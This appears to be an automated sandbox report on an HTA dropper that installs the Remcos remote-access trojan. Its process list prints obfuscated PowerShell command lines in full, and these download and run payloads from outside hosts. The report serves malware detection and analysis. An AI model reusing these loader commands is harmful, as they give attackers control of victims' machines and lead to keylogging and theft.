                                                                                                                    2024-12-13 06:38:53 UTC1369INData Raw: 7a 30 31 4d 2b 4d 44 48 79 34 71 4d 4d 4b 44 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 36 55 6a 4f 70 6f 7a 46 35 4d 66 4f 6b 6e 6a
                                                                                                                    Data Ascii: z01M+MDHy4qMMKDfycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR6UjOpozF5MfOknj
                                                                                                                    2024-12-13 06:38:53 UTC1369INData Raw: 38 78 4d 34 50 6a 34 79 34 71 4d 39 4a 6a 63 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 51 52 4d 75 41 41 41 41 51 44 41 44 41 50 41
                                                                                                                    Data Ascii: 8xM4Pj4y4qM9JjcyclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjByQRMuAAAAQDADAPA
                                                                                                                    2024-12-13 06:38:53 UTC1369INData Raw: 4d 4d 4a 44 7a 77 77 30 4c 4d 34 43 6a 73 77 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 75 50 61 37 54 31 2b 38 73 50 4a 37 7a 77 2b
                                                                                                                    Data Ascii: MMJDzww0LM4CjswwKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+AuPa7T1+8sPJ7zw+


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:01:38:18
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:mshta.exe "C:\Users\user\Desktop\creamkissingthingswithcreambananapackagecreamy.hta"
                                                                                                                    Imagebase:0xc00000
                                                                                                                    File size:13'312 bytes
                                                                                                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:01:38:19
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                                                                                                                    Imagebase:0x1c0000
                                                                                                                    File size:236'544 bytes
                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:01:38:19
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:01:38:19
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                                                                                                                    Imagebase:0x600000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:01:38:21
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"
                                                                                                                    Imagebase:0x700000
                                                                                                                    File size:2'141'552 bytes
                                                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:01:38:22
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP"
                                                                                                                    Imagebase:0xf30000
                                                                                                                    File size:46'832 bytes
                                                                                                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:01:38:28
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"
                                                                                                                    Imagebase:0xc10000
                                                                                                                    File size:147'456 bytes
                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:01:38:29
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
                                                                                                                    Imagebase:0x600000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:9
                                                                                                                    Start time:01:38:29
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:12
                                                                                                                    Start time:01:38:53
                                                                                                                    Start date:13/12/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                    Imagebase:0xad0000
                                                                                                                    File size:108'664 bytes
                                                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Reset < >
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2142957891.0000000006D60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_6d60000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                      • Instruction ID: 16ca8b8b5569fc3686568f1a82da32a9dd346408efbe46ade4abdd9f2c7984b8
                                                                                                                      • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2142957891.0000000006D60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_6d60000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                      • Instruction ID: 16ca8b8b5569fc3686568f1a82da32a9dd346408efbe46ade4abdd9f2c7984b8
                                                                                                                      • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:4.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:14.6%
                                                                                                                      Total number of Nodes:48
                                                                                                                      Total number of Limit Nodes:6
                                                                                                                      execution_graph 8955 300763f 8956 30075da 8955->8956 8957 300764b 8955->8957 8963 3007a08 8956->8963 8971 3007c45 8956->8971 8978 3007da8 8956->8978 8985 3007a18 8956->8985 8958 30075df 8968 3007a4c 8963->8968 8965 3007d57 URLDownloadToFileW 8966 3007ea8 8965->8966 8966->8958 8967 3007b30 8967->8958 8968->8965 8968->8967 8993 75745f4 8968->8993 9002 7574610 8968->9002 8975 3007b9a 8971->8975 8972 3007d57 URLDownloadToFileW 8974 3007ea8 8972->8974 8974->8958 8975->8972 8976 75745f4 4 API calls 8975->8976 8977 7574610 4 API calls 8975->8977 8976->8972 8977->8972 8979 3007cf9 8978->8979 8983 75745f4 4 API calls 8979->8983 8984 7574610 4 API calls 8979->8984 8981 3007d57 URLDownloadToFileW 8982 3007ea8 8981->8982 8982->8958 8983->8981 8984->8981 8990 3007a4c 8985->8990 8987 3007d57 URLDownloadToFileW 8988 3007ea8 8987->8988 8988->8958 8989 3007b30 8989->8958 8990->8987 8990->8989 8991 75745f4 4 API calls 8990->8991 8992 7574610 4 API calls 8990->8992 8991->8987 8992->8987 8995 7574610 8993->8995 8994 7574a93 8994->8965 8995->8994 8997 3007c45 5 API calls 8995->8997 8999 3007a08 5 API calls 8995->8999 9000 3007a18 5 API calls 8995->9000 9001 3007da8 5 API calls 8995->9001 9011 3001bf8 8995->9011 8996 7574a34 8996->8965 8997->8996 8999->8996 9000->8996 9001->8996 9003 7574a93 9002->9003 9004 7574641 9002->9004 9003->8965 9004->9003 9006 3007c45 5 API calls 9004->9006 9007 3001bf8 URLDownloadToFileW 9004->9007 9008 3007a08 5 API calls 9004->9008 9009 3007a18 5 API calls 9004->9009 9010 3007da8 5 API calls 9004->9010 9005 7574a34 9005->8965 9006->9005 9007->9005 9008->9005 9009->9005 9010->9005 9012 3007e00 URLDownloadToFileW 9011->9012 9014 3007ea8 9012->9014 9014->8996

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 3007a18-3007a4a 1 3007a90 0->1 2 3007a4c-3007a53 0->2 5 3007a93-3007acf 1->5 3 3007a64 2->3 4 3007a55-3007a62 2->4 6 3007a66-3007a68 3->6 4->6 14 3007ad5-3007ade 5->14 15 3007b58-3007b63 5->15 8 3007a6a-3007a6d 6->8 9 3007a6f-3007a71 6->9 13 3007a8e 8->13 11 3007a82 9->11 12 3007a73-3007a80 9->12 16 3007a84-3007a86 11->16 12->16 13->5 14->15 17 3007ae0-3007ae6 14->17 18 3007b72-3007b94 15->18 19 3007b65-3007b68 15->19 16->13 21 3007de8-3007dfd 17->21 22 3007aec-3007af9 17->22 26 3007b9a-3007ba3 18->26 27 3007c5e-3007d52 18->27 19->18 31 3007e50-3007e52 21->31 32 3007dff-3007e4d 21->32 24 3007afb-3007b2e 22->24 25 3007b4f-3007b56 22->25 43 3007b30-3007b33 24->43 44 3007b4b 24->44 25->15 25->17 26->21 30 3007ba9-3007be7 26->30 77 3007d55 call 75745f4 27->77 78 3007d55 call 7574610 27->78 51 3007c01-3007c14 30->51 52 3007be9-3007bff 30->52 35 3007e54-3007e5a 31->35 36 3007e5d-3007e63 31->36 32->31 35->36 37 3007e71-3007ea6 URLDownloadToFileW 36->37 38 3007e65-3007e6e 36->38 41 3007ea8-3007eae 37->41 42 3007eaf-3007ec3 37->42 38->37 41->42 47 3007b35-3007b38 43->47 48 3007b3f-3007b48 43->48 44->25 47->48 54 3007c16-3007c1d 51->54 52->54 56 3007c42 54->56 57 3007c1f-3007c30 54->57 56->27 57->56 60 3007c32-3007c3b 57->60 60->56 71 3007d57-3007d60 72 3007d62-3007d78 71->72 73 3007d7a-3007d8d 71->73 74 